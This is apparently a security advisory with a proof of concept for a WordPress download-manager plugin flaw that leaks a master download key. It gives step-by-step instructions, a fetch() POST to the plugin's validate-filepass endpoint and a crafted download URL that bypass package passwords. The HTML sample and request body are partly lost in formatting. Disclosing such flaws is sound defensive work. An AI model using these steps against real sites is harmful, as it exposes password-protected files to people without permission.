The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.
- Create a password protected package containing one or more files. - Navigate to the download page of the package (e.g. /download/package1
) - Inspect the “Download” button beside one of the packaged files. The HTML should look like this: __ Download - Note the wpdmdl
and ind
URL parameters for later. - Send a POST request to /wp-json/wpdm/validate-filepass
: fetch(“/wp-json/wpdm/validate-filepass”, { “headers”: { “accept”: “/”, “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()).then(text => console.log(text)); - The response will look like the following: {“success”:true,“downloadurl”:“/wp-json/wpdm/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind;=”} - Construct a download URL as follows, using the above _wpdmkey
parameter, as well as the wpdmdl
and ind
parameters from above: https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind;=12345678&_wpdmkey=abcdef - See that the file may be download from that URL, without any knowledge of its password.